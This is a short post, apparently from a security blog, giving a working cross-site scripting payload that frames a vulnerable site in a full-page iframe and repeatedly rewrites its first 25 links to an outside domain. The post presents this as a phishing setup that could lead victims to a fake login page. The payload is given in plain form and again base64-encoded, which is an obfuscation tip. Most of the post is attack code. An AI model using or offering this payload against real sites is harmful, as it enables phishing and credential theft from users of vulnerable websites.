Fun with XSS

If you find an XSS but there are no cookies to steal, maybe you could show a PoC that manipulates the content of the websites main page, which could be used in a phishing scenario. The following would alter the first 25 links on the webpage and point them to https://kennyjansson.com. Which could have displayed a fake login page for example. Through clicking on the site as usual, it seems more trustworthy than a link that goes directly to the website.

write('<html><body><script>function a() { for (var i=0, max=25; i < max; i++) {parent.document.getElementsByTagName("iframe")[0].contentWindow.document.getElementsByTagName("a")[i].href ="https://kennyjansson.com/"};console.log("I am under control of this page"); setTimeout(function () { a() }, 3000);} if (typeof pframe === "undefined") { var iframe = document.createElement("iframe");iframe.onload = a;iframe.width = "100%";iframe.height = "100%"; iframe.src = "https://vulnerablewebsitewithxss.com"; iframe.frameBorder=0;iframe.setAttribute("style", "position:absolute;top:1px;left:2px");iframe.name = "netframe";body = document.getElementsByTagName("body")[0];body.appendChild(iframe); second = "yes";pframe = parent.document.getElementsByTagName("iframe")[0].contentWindow.document.location.href}')

You can base64 encode

write(atob('PGh0bWw+PC9ib2R5PjxzY3JpcHQ+ZnVuY3Rpb24gYSgpIHsgZm9yICh2YXIgaT0wLCBtYXg9MjU7IGkgPCBtYXg7IGkrKykge3BhcmVudC5kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaWZyYW1lIilbMF0uY29udGVudFdpbmRvdy5kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpW2ldLmhyZWYgPSJodHRwczovL2tlbm55amFuc3Nvbi5jb20vIn07Y29uc29sZS5sb2coIkkgYW0gdW5kZXIgY29udHJvbCBvZiB0aGlzIHBhZ2UiKTsgc2V0VGltZW91dChmdW5jdGlvbiAoKSB7IGEoKSB9LCAzMDAwKTt9IGlmICh0eXBlb2YgcGZyYW1lID09PSAidW5kZWZpbmVkIikgeyB2YXIgaWZyYW1lID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiaWZyYW1lIik7aWZyYW1lLm9ubG9hZCA9IGE7aWZyYW1lLndpZHRoID0gIjEwMCUiO2lmcmFtZS5oZWlnaHQgPSAiMTAwJSI7IGlmcmFtZS5zcmMgPSAiaHR0cHM6Ly92dWxuZXJhYmxld2Vic2l0ZXdpdGh4c3MuY29tIjsgaWZyYW1lLmZyYW1lQm9yZGVyPTA7aWZyYW1lLnNldEF0dHJpYnV0ZSgic3R5bGUiLCAicG9zaXRpb246YWJzb2x1dGU7dG9wOjFweDtsZWZ0OjJweCIpO2lmcmFtZS5uYW1lID0gIm5ldGZyYW1lIjtib2R5ID0gZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImJvZHkiKVswXTtib2R5LmFwcGVuZENoaWxkKGlmcmFtZSk7IHNlY29uZCA9ICJ5ZXMiO3BmcmFtZSA9IHBhcmVudC5kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaWZyYW1lIilbMF0uY29udGVudFdpbmRvdy5kb2N1bWVudC5sb2NhdGlvbi5ocmVmfTwvc2NyaXB0PjwvYm9keT48L2h0bWw+'))